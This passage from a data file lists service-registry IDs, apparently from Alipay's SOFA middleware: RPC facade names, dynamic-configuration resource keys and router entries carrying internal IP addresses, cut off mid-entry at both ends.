D#@#SOFA","Alipay.airbops:name=com.alipay.airbops.mobilepayfront.EnvironmentTransfer.environment,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:pcreditmng_risk_sync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepRightsBizFacade:1.0:reading@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsUpVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antsecbase.facade.semantic.SemanticKnowledgeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.InsMktSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:gzmshmp-hbjmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.datacontextlib.dataswap.client.drm.DataSwapClientDrmResource.properties,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.44.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.ptcore.common.service.facade.api.presstest.PressTestDataRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.component.endpoint.sofarest.PasswordsRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.custdecision.service.facade.AbnormalCompareFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.common.service.facade.api.MerchantAcceptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchopmng.merchant.common.service.facade.api.CrmMerchantCardAuditMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.activity.api.SceneActivityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_FININFO_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.memberprod.common.api.CloseWarningInvokeService:1.0:mrchprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.tax.TaxBizOrderServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.proposal.MobileClientProposalQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.account.AccountQueryRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.249#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inshealthprod.facade.GiftSportsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.contract.service.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.FinYebAssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.154.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCompanyManager.goldPositionCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.comparacenter.common.service.facade.manage.api.instance.ComParaDataOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.bot.facade.var.BotVarFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.SvQuotationManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pkgcore.common.service.facade.DevelopPackageOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zdal.ldc.tair.bankcardTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finslip.common.service.facade.notify.RemedyNotifyService:1.0:remedyFinCompose@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayChannelConsultDecisionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.SplitReaderCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.DowngradeSwitchConfig.skipAllStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.flab.api.flabinnovation.AlipayBoxEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zfundcheck.common.service.facade.RuleInfoServiceFacade:1.0:alipayService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omoaidbase.common.service.facade.videocall.VideoCallMaterialManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.limitcenter.service.facade.accumulate.api.UnifiedLimitAccumulateXtsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compass.common.service.facade.api.LoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.cooperation.service.CooperationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.article.synchronization.facade.ContentSynchronizationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.autoaccess.EbppInstVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.nebula.MobileAppSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.grayctrl.GrayCtrlRecordQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:remindMergeExecuter$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finsupport.component.cache.masterdata.drm.MasterdataDRM.checkResultCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iamlscan.common.service.query.facade.api.AmlSiftService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.YebFundLogicRealDbConfigRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.midas.service.facade.api.PatternValueQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.verity.SettleVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:assettrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mrchservbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfarm.common.service.facade.AntfarmUserMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfquote.common.service.facade.api.InquiryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mobileops_mobileopsProcessCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.CrowdTargetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.loadTestSampleBizAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.fpc.rpc.FootprintPbRpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.BeanTaskQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.das.biz.share.data.InsightDataProcesser:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:minipcodemarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:artvcroom@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.1.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.CardService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.service.facade.spi.CashierActivityCallbackFacade:1.0:promoprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commissioncenter.common.service.facade.api.DataSyncToOdpsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ordermng.common.service.api.merchant.MerchantBizBelongService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.RuleCenterExecutorResource.executorName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alinp.common.service.facade.intelligent.SuspectFindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.adjust.api.PointsAdjustUploadMngService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:drillcenter_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.null:name=com.antcloud.ifcidentitycloudus.biz.nac.drm.NacConfigDrmServiceImpl.pullLogConnectSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.findecision.biz.shared.SystemConfig.isOpenDecisionIntercept,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.template.VcpStoreSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:iotface.test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ACONECONSOLE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditrmp.facade.DevOpsTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finorm.finriskcenter.common.facade.api.guardian.OssFileTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.riskmng.common.service.facade.api.CsCheckServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openevent.facade.ExpressIsvFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finadvisorprod.common.service.facade.api.FinadvisorAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@punishcenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.prodswitch.common.service.facade.ProductSwitchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finallocation.common.service.facade.api.AllocationMngSchemaModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.FixedDataSyncDrmImpl.writeSyncOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppcore.facade.confmng.MiscConfMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_K_CUSTOMER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyTransFacade:1.0:INNERSECOND@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.contract.precheck.UserPreCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_RISKPLUSCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_F_YUNPUSH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_guaranteeMerchantListImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.210.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.vehownerprod.parkingfacade.parkingbackend.ParkingBackendServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.biz.service.impl.ctuevent.CtuEventStoreManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.question.structured.facade.RouteNodeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.govbizprodsys.common.service.facade.govbizprodsysconfig.TaskConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.livekit.LiveTaobaoBasicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SecuDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfundbuss.biz.mobile.onlinetest.LoadTestMock:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchanttrade.common.service.facade.api.RefundOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirefront.service.facade.api.AcquireRefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.fop.api.ShopSubscribeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimdecision.common.service.InsDecisionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.afsc.common.service.multimonitor.service.MessageOutputServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcreditagreement.common.service.agreement.general.GeneralAgreementWeekConsistencyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchselfop.common.service.ooda.facade.darwin.ProductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.transfercode.RedPacketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cloud.apfasmng.common.service.facade.antvip.ServerlessPaasAntVipFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.publichome.common.service.facade.message.template.MessageTemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imasp.common.service.facade.ScenePointService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igtransferprod.common.service.facade.router.api.IgtpRouterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.YslmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.53.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_MTP#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.QrCodeExpireTimeConfigResource.localExpireTime,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_F_CLEARINGCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.facade.alarmanalysis.WorkAssistantInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.102.210.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.reconRecoveryTaskInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.idpatrol.core.service.inspect.IdCaseCrontabRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.user.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.securitycap_apaycrm_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.consumequery.common.service.facade.DynamicConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmepratingbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdistinguish.common.service.facade.MerchantRedImageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_SECURITY_DATAACCESS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mydds:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.KbsearchDrmConfigImpl.systemStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.exportCrowdWarningThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trafficcardsp.common.service.facade.TcspTripEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.130.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openctrl.facade.ApiInvokeErrDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","alipassprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zdrmdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.tvm.TvmProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.serverSwitchOnLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insautomarket.common.facade.greenowner.AutoGreenCarOwnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:minicenterAntProcessAfterNodeCreateCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.NewKeyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instradeprod2.common.service.TradeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfodecision.common.service.facade.decision.DecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.libracore.common.service.facade.api.YueAccessRecommendFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.zpublishuiweb.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.betaScriptSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.girisk.strategy.service.facade.api.serve.ServeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.115.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.taskcenter.TaskCenterFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.ecologyPointSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.loadChkTaskDetailSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fpdecision.engine.validation.loader.DecisionValidationLoader:1.0:fakeDecisionValidationLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.BizIdentityQueryForClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP-C-PROXYPROBE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imemberprod.service.facade.api.PayPassWordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vouchercore.service.facade.api.stock.StockUseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.service.facade.idc.IdentificationDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-iexchange-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insclaiminvestprod.facade.claim.invest.ClaimInvestTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instriskcenter.facade.api.InstBusinessIndexQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.api.SecurityPolicyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmSlaDynamicDecisionTrigger.changeLogLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:inscvprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_Finance_Test#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_FP_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secucommunity.common.service.facade.follow.api.UserFollowingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.voucher.VcpVoucherManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mcomment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.activity.drm.SceneActivityDrm.finpwmActivityConf,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-quotprod-meta-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_P_O_RISKMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:fin.userpurchase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExSourceRateMonitorConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromofront.facade.applet.api.AppletService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:unitradeadapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.biz.monitor.custom.drm.KeyBizIndexResource.openTimeTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantContactPersonFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.facade.PostmenMigrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetViewItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.credit.CreditAuthzQueryFacade:1.0:creditAuthzQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.testCacheTbase.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fundprod2:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcbenefitcore.facade.service.ThirdpartyMixedTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepromo.common.service.facade.offlinetaobao.PointInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.download.api.ErcBillQueryDownLoadService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authcenter.service.facade.HavanaLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ALPHASECMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.trade.prod.schedule.drm.SyncInitAndPrecheckedOrderDRMResource.threadSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dwsap.common.service.facade.dsdc.SyncMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_ST_CE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_ST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ccrprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.csbizcenter.facade.GrayDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SO